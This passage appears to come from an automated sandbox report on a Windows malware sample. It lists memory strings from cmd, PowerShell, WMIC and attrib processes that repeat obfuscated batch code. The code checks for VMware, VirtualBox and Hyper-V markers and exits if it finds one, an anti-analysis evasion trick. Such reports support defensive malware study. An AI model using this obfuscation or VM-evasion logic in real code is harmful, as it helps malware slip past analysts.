Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFI
Source: powershell.exe, 00000029.00000002.1870747846.000000C0000BA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program Files
Source: cmd.exe, 0000000B.00000003.1407834284.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kwindir=C:\Windowsee
Source: WMIC.exe, 0000001A.00000002.1459712222.000002894DBD4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OV
Source: cmd.exe, 0000000B.00000003.1412739456.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=n
Source: cmd.exe, 0000000B.00000003.1433229188.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1422648451.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o&&
Source: cmd.exe, 0000000B.00000003.1425496788.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: WMIC.exe, 0000001A.00000003.1455315227.000002894DA3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OX
Source: attrib.exe, 00000023.00000002.1536841194.0000014725BD4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=ODe
Source: cmd.exe, 0000000B.00000003.1431796263.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common 